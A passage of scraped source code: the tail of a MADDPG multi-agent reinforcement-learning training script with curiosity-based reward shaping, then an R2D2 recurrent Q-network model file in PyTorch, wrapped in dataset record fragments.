parser.add_argument("--display", action="store_true", default=False)
parser.add_argument("--benchmark", action="store_true", default=False)
parser.add_argument("--benchmark-iters", type=int, default=100000, help="number of iterations run for benchmarking")
parser.add_argument("--benchmark-dir", type=str, default="./benchmark_files/", help="directory where benchmark data is saved")
parser.add_argument("--plots-dir", type=str, default="./complex_game/", help="directory where plot data is saved")
parser.add_argument("--reward-shaping-ag", action="store_true", default=False, help="whether enable reward shaping of agents")
parser.add_argument("--reward-shaping-adv", action="store_true", default=False, help="whether enable reward shaping of adversaries")
parser.add_argument("--policy_noise", default=0.2,type=float)
parser.add_argument("--noise_clip", default=0.2,type=float)
parser.add_argument("--policy_freq", default=2, type=int)
parser.add_argument("--pettingzoo", action="store_true", default=False)
parser.add_argument("--start_timesteps", default=10, type=int)
return parser.parse_args()
def mlp_model(input, num_outputs, scope, reuse=False, num_units=64, rnn_cell=None):
# This model takes as input an observation and returns values of all actions
with tf.variable_scope(scope, reuse=reuse):
out = input
out = layers.fully_connected(out, num_outputs=num_units, activation_fn=tf.nn.relu)
out = layers.fully_connected(out, num_outputs=num_units//2, activation_fn=tf.nn.relu)
out = layers.fully_connected(out, num_outputs=num_outputs, activation_fn=None)
return out
def make_env(scenario_name, arglist, benchmark=False):
from multiagent.environment import MultiAgentEnv
import multiagent.scenarios as scenarios
from experiments.pz import create_env
print("env is ",arglist.scenario)
if arglist.pettingzoo:
env = create_env(arglist.scenario)
# arglist.num_adversaries = 0
print("adversary agents number is {}".format(arglist.num_adversaries))
return env
# load scenario from script
scenario = scenarios.load(scenario_name + ".py").Scenario()
# create world
world = scenario.make_world()
try:
arglist.num_adversaries = len(scenario.adversaries(world))
except:
if arglist.scenario == 'simple_push':
arglist.num_adversaries = 1
else:
arglist.num_adversaries = 0
arglist.reward_shaping_adv = False
print("adversary agents number is {}".format(arglist.num_adversaries))
# create multiagent environment
if benchmark:
env = MultiAgentEnv(world, scenario.reset_world, scenario.reward, scenario.observation, scenario.benchmark_data)
else:
env = MultiAgentEnv(world, scenario.reset_world, scenario.reward, scenario.observation)
return env
def get_trainers(env, num_adversaries, obs_shape_n, arglist, agents):
trainers = []
model = mlp_model
trainer = MADDPGAgentTrainer
if not arglist.pettingzoo:
for i in range(num_adversaries):
trainers.append(trainer(
"agent_%d" % i, model, obs_shape_n, env.action_space, i, arglist,
local_q_func=(arglist.adv_policy=='ddpg'),agent=None))
for i in range(num_adversaries, env.n):
trainers.append(trainer(
"agent_%d" % i, model, obs_shape_n, env.action_space, i, arglist,
local_q_func=(arglist.good_policy=='ddpg'),agent=None))
else:
trainers.append(trainer(
"agent_%d" % 0, model, obs_shape_n, env.action_spaces.values(), 0, arglist,
local_q_func=(arglist.adv_policy=='ddpg'),agent=agents[0]))
trainers.append(trainer(
"agent_%d" % 1, model, obs_shape_n, env.action_spaces.values(), 1, arglist,
local_q_func=(arglist.good_policy=='ddpg'),agent=agents[1]))
return trainers
def create_dirs(arglist):
import os
os.makedirs(os.path.dirname(arglist.benchmark_dir), exist_ok=True)
os.makedirs(os.path.dirname(arglist.plots_dir), exist_ok=True)
def transform_obs_n(obs_n):
import torch
input = obs_n[0]
for i in range(1, len(obs_n)):
input = np.append(input, obs_n[i])
return torch.from_numpy(input).float()
def train(arglist):
with U.single_threaded_session():
# Create environment
env = make_env(arglist.scenario, arglist, arglist.benchmark)
# Create agent trainers
if not arglist.pettingzoo:
obs_shape_n = [env.observation_space[i].shape for i in range(env.n)]
action_shape_n = []
for i in range(env.n):
if hasattr(env.action_space[i],"n"):
action_shape_n.append(env.action_space[i].n)
elif not isinstance(env.action_space[i],MultiDiscrete):
action_shape_n.append(env.action_space[i].shape)
else:
num = 0
for j in range(len(env.action_space[i].high)):
num+=(env.action_space[i].high[j]-env.action_space[i].low[j]+1)
action_shape_n.append(num)
else:
agents = [agent for agent in (env.possible_agents)]
obs_shape_n = [env.observation_spaces[agent].shape for agent in agents]
action_shape_n = []
for agent in agents:
if hasattr(env.action_spaces[agent],"n"):
action_shape_n.append(env.action_spaces[agent].n)
else:
action_shape_n.append(env.action_spaces[agent].shape)
num_adversaries = min(99, arglist.num_adversaries)
trainers = get_trainers(env, num_adversaries, obs_shape_n, arglist, agents)
print('Using good policy {} and adv policy {}'.format(arglist.good_policy, arglist.adv_policy))
# Initialize
U.initialize()
# Load previous results, if necessary
if arglist.load_dir == "":
arglist.load_dir = arglist.save_dir
if arglist.restore or arglist.benchmark:
print('Loading previous state...')
U.load_state(arglist.load_dir)
# create dirs for saving benchmark data and reward data
create_dirs(arglist)
episode_rewards = [0.0] # sum of rewards for all agents
episode_original_rewards = [0.0] # sum of original rewards for all agents
if not arglist.pettingzoo:
agent_rewards = [[0.0] for _ in range(env.n)] # individual agent reward
agent_original_rewards = [[0.0] for _ in range(env.n)] # individual original agent reward
else:
agent_rewards = [[0.0] for _ in env.possible_agents]
agent_original_rewards = [[0.0] for _ in env.possible_agents] # individual original agent reward
final_ep_rewards = [] # sum of rewards for training curve
final_ep_ag_rewards = [] # agent rewards for training curve
agent_info = [[[]]] # placeholder for benchmarking info
saver = tf.train.Saver()
if not arglist.pettingzoo:
obs_n = env.reset()
else:
from experiments.pz import reset
obs_n = reset(env,agents)
# obs_n=[]
# for agent in agents:
# obs_n.append(t[agent])
episode_step = 0
train_step = 0
# two teams embedding network
embedding_model_adv = EmbeddingModel(obs_size=obs_shape_n[0:num_adversaries], num_outputs=action_shape_n[0:num_adversaries])
embedding_model_ag = EmbeddingModel(obs_size=obs_shape_n[num_adversaries:], num_outputs=action_shape_n[num_adversaries:])
episodic_memory_adv = []
episodic_memory_ag = []
if arglist.reward_shaping_adv:
episodic_memory_adv.append(embedding_model_adv.embedding(transform_obs_n(obs_n[0:num_adversaries])))
if arglist.reward_shaping_ag:
episodic_memory_ag.append(embedding_model_ag.embedding(transform_obs_n(obs_n[num_adversaries:])))
t_start = time.time()
print('Starting iterations...')
# profiler = Profiler()
# profiler.start()
while True:
# get action: possibility distribution
# env.render()
action_n=[]
if len(episode_rewards) < arglist.start_timesteps and not arglist.restore:
for agent,shape in zip(trainers,action_shape_n):
action = np.random.rand(shape)
action = action / np.sum(action)
action_n.append((action,agent.agent))
else:
action_n = [(agent.action(obs),agent.agent) for agent, obs in zip(trainers,obs_n)]
# environment step
if not arglist.pettingzoo:
new_obs_n, rew_n, done_n, info_n = env.step(action_n)
else:
from experiments.pz import step
# 预防环境异常
try:
new_obs_n, rew_n, done_n, info_n = step(action_n,env)
except Exception as e:
print(repr(e))
from experiments.pz import reset
obs_n = reset(env,agents)
continue
original_rew_n = rew_n.copy()
action_n = [action for action,agent in action_n]
# add reward shaping
if arglist.reward_shaping_adv == True:
new_obs_tensor = transform_obs_n(new_obs_n[0:num_adversaries])
next_state_emb_adv = embedding_model_adv.embedding(new_obs_tensor)
intrinsic_reward_adv = embedding_model_adv.compute_intrinsic_reward(episodic_memory_adv, next_state_emb_adv,new_obs_tensor)
episodic_memory_adv.append(next_state_emb_adv)
for i in range(0,num_adversaries):
# can add life long curiosity
rew_n[i] += Config.beta *intrinsic_reward_adv
if arglist.reward_shaping_ag == True:
new_obs_tensor = transform_obs_n(new_obs_n[num_adversaries:])
next_state_emb_ag = embedding_model_ag.embedding(new_obs_tensor)
intrinsic_reward_ag = embedding_model_ag.compute_intrinsic_reward(episodic_memory_ag, next_state_emb_ag,new_obs_tensor)
episodic_memory_ag.append(next_state_emb_ag)
if not arglist.pettingzoo:
for i in range(num_adversaries,env.n):
rew_n[i] += Config.beta * intrinsic_reward_ag
else:
for i in range(num_adversaries,len(env.possible_agents)):
rew_n[i] += Config.beta * intrinsic_reward_ag
episode_step += 1
done = all(done_n)
terminal = (episode_step >= arglist.max_episode_len)
# collect experience
for i, agent in enumerate(trainers):
agent.experience(obs_n[i], action_n[i], rew_n[i], new_obs_n[i], done_n[i], terminal)
obs_n = new_obs_n
for i, rew in enumerate(rew_n):
episode_rewards[-1] += rew
episode_original_rewards[-1] += original_rew_n[i]
agent_rewards[i][-1] += rew
agent_original_rewards[i][-1] += original_rew_n[i]
if done or terminal:
terminal = True
# obs_n = env.reset()
if not arglist.pettingzoo:
obs_n = env.reset()
else:
from experiments.pz import reset
obs_n = reset(env,agents)
episode_step = 0
episode_rewards.append(0)
episode_original_rewards.append(0)
for a in agent_rewards:
a.append(0)
for a in agent_original_rewards:
a.append(0)
agent_info.append([[]])
# reset episode embedding network
episodic_memory_adv.clear()
# embedding_model_adv.lastReward=0
episodic_memory_ag.clear()
# embedding_model_ag.lastReward=0
if arglist.reward_shaping_adv:
episodic_memory_adv.append(embedding_model_adv.embedding(transform_obs_n(obs_n[0:num_adversaries])))
if arglist.reward_shaping_ag:
episodic_memory_ag.append(embedding_model_ag.embedding(transform_obs_n(obs_n[num_adversaries:])))
# increment global step counter
train_step += 1
# for benchmarking learned policies
if arglist.benchmark:
for i, info in enumerate(info_n):
agent_info[-1][i].append(info_n['n'])
if train_step > arglist.benchmark_iters and (done or terminal):
file_name = arglist.benchmark_dir + arglist.exp_name + '.pkl'
print('Finished benchmarking, now saving...')
with open(file_name, 'wb') as fp:
pickle.dump(agent_info[:-1], fp)
break
continue
# for displaying learned policies
if arglist.display:
# time.sleep(0.1)
env.render()
if arglist.restore:
continue
# update all trainers, if not in display or benchmark mode
loss = None
for agent in trainers:
agent.preupdate()
for agent in trainers:
loss = agent.update(trainers, train_step)
# train embedding network
obs_n_train = []
obs_next_n_train = []
act_n_train = []
if (arglist.reward_shaping_adv or arglist.reward_shaping_ag):
if arglist.reward_shaping_adv == True and train_step > Config.train_episode_num * 10:
for i in range(0,num_adversaries):
obs, act, rew, obs_next, done = trainers[i].sample(Config.train_episode_num)
obs_n_train.append(obs)
obs_next_n_train.append(obs_next)
act_n_train.append(act)
embedding_loss_adv = embedding_model_adv.train_model(obs_n_train,obs_next_n_train,act_n_train)
if arglist.reward_shaping_ag == True and train_step > Config.train_episode_num * 10:
obs_n_train = []
obs_next_n_train = []
act_n_train = []
n = 0
if not arglist.pettingzoo:
n= env.n
else:
n= len(env.possible_agents)
for i in range(num_adversaries,n):
obs, act, rew, obs_next, done = trainers[i].sample(Config.train_episode_num)
obs_n_train.append(obs)
obs_next_n_train.append(obs_next)
act_n_train.append(act)
embedding_loss_ag = embedding_model_ag.train_model(obs_n_train,obs_next_n_train,act_n_train)
# save model, display training output
if (terminal) and (len(episode_rewards) % arglist.save_rate == 0):
U.save_state(arglist.save_dir, saver=saver)
# print statement depends on whether or not there are adversaries
if num_adversaries == 0:
print("steps: {}, episodes: {}, mean episode reward: {}, {}, time: {}".format(
train_step, len(episode_rewards)-1, np.mean(episode_original_rewards[-arglist.save_rate-1:-1]),
np.mean(episode_rewards[-arglist.save_rate-1:-1]), round(time.time()-t_start, 3)))
else:
print("steps: {}, episodes: {}, mean episode reward: {}, agent episode reward: {}, {}, time: {}".format(
train_step, len(episode_rewards)-1, np.mean(episode_original_rewards[-arglist.save_rate-1:-1]),
[np.mean(rew[-arglist.save_rate-1:-1]) for rew in agent_original_rewards],
[np.mean(rew[-arglist.save_rate-1:-1]) for rew in agent_rewards],
round(time.time()-t_start, 3)))
# profiler.stop()
# profiler.print()
# if arglist.reward_shaping_adv:
# print("adv agent original episode reward: {}".format(
# [np.mean(rew[-arglist.save_rate:]) for rew in agent_rewards[0:num_adversaries]]
# ))
# if arglist.reward_shaping_ag:
# print("agent original episode reward: {}".format(
# [np.mean(rew[-arglist.save_rate:]) for rew in agent_original_rewards[num_adversaries:env.n]]
# ))
t_start = time.time()
# Keep track of final episode reward
final_ep_rewards.append(np.mean(episode_original_rewards[-arglist.save_rate-1:-1]))
for rew in agent_original_rewards:
final_ep_ag_rewards.append(np.mean(rew[-arglist.save_rate-1:-1]))
# saves final episode reward for plotting training curve later
if len(episode_rewards) > arglist.num_episodes:
rew_file_name = arglist.plots_dir + arglist.exp_name + '_rewards.pkl'
with open(rew_file_name, 'wb') as fp:
pickle.dump(final_ep_rewards, fp)
agrew_file_name = arglist.plots_dir + arglist.exp_name + '_agrewards.pkl'
with open(agrew_file_name, 'wb') as fp:
pickle.dump(final_ep_ag_rewards, fp)
print('...Finished total of {} episodes.'.format(len(episode_rewards)))
break
if __name__ == '__main__':
arglist = parse_args()
train(arglist)
``` |
{
"source": "2015211289/R2D2-ngu",
"score": 3
} |
#### File: 2015211289/R2D2-ngu/model.py
```python
import torch
import torch.nn as nn
import torch.nn.functional as F
from config import config
class R2D2(nn.Module):
def __init__(self, num_inputs, num_outputs):
super(R2D2, self).__init__()
self.num_inputs = num_inputs
self.num_outputs = num_outputs
self.lstm = nn.LSTM(input_size=num_inputs, hidden_size=config.hidden_size, batch_first=True)
self.fc = nn.Linear(config.hidden_size, 128)
self.fc_adv = nn.Linear(128, num_outputs)
self.fc_val = nn.Linear(128, 1)
def forward(self, x, hidden=None):
# x [batch_size, sequence_length, num_inputs]
batch_size = x.size()[0]
sequence_length = x.size()[1]
out, hidden = self.lstm(x, hidden)
out = F.relu(self.fc(out))
adv = self.fc_adv(out)
adv = adv.view(batch_size, sequence_length, self.num_outputs)
val = self.fc_val(out)
val = val.view(batch_size, sequence_length, 1)
qvalue = val + (adv - adv.mean(dim=2, keepdim=True))
return qvalue, hidden
@classmethod
def get_td_error(cls, online_net, target_net, batch, lengths):
def slice_burn_in(item):
return item[:, config.burn_in_length :, :]
batch_size = torch.stack(batch.state).size()[0]
states = torch.stack(batch.state).view(batch_size, config.sequence_length, online_net.num_inputs)
next_states = torch.stack(batch.next_state).view(batch_size, config.sequence_length, online_net.num_inputs)
actions = torch.stack(batch.action).view(batch_size, config.sequence_length, -1).long()
rewards = torch.stack(batch.reward).view(batch_size, config.sequence_length, -1)
masks = torch.stack(batch.mask).view(batch_size, config.sequence_length, -1)
steps = torch.stack(batch.step).view(batch_size, config.sequence_length, -1)
rnn_state = torch.stack(batch.rnn_state).view(batch_size, config.sequence_length, 2, -1)
[h0, c0] = rnn_state[:, 0, :, :].transpose(0, 1)
h0 = h0.unsqueeze(0).detach()
c0 = c0.unsqueeze(0).detach()
[h1, c1] = rnn_state[:, 1, :, :].transpose(0, 1)
h1 = h1.unsqueeze(0).detach()
c1 = c1.unsqueeze(0).detach()
pred, _ = online_net(states, (h0, c0))
next_pred, _ = target_net(next_states, (h1, c1))
next_pred_online, _ = online_net(next_states, (h1, c1))
pred = slice_burn_in(pred)
next_pred = slice_burn_in(next_pred)
actions = slice_burn_in(actions)
rewards = slice_burn_in(rewards)
masks = slice_burn_in(masks)
steps = slice_burn_in(steps)
next_pred_online = slice_burn_in(next_pred_online)
pred = pred.gather(2, actions)
_, next_pred_online_action = next_pred_online.max(2)
target = rewards + masks * pow(config.gamma, steps) * next_pred.gather(2, next_pred_online_action.unsqueeze(2))
td_error = pred - target.detach()
for idx, length in enumerate(lengths):
td_error[idx][length - config.burn_in_length :][:] = 0
return td_error
@classmethod
def train_model(cls, online_net, target_net, optimizer, batch, lengths):
td_error = cls.get_td_error(online_net, target_net, batch, lengths)
loss = pow(td_error, 2).mean()
optimizer.zero_grad()
loss.backward()
optimizer.step()
return loss, td_error
def get_action(self, state, hidden):
state = state.unsqueeze(0).unsqueeze(0)
qvalue, hidden = self.forward(state, hidden)
_, action = torch.max(qvalue, 2)
return action.numpy()[0][0], hidden
``` |
Subsets and Splits
No saved queries yet
Save your SQL queries to embed, download, and access them later. Queries will appear here once saved.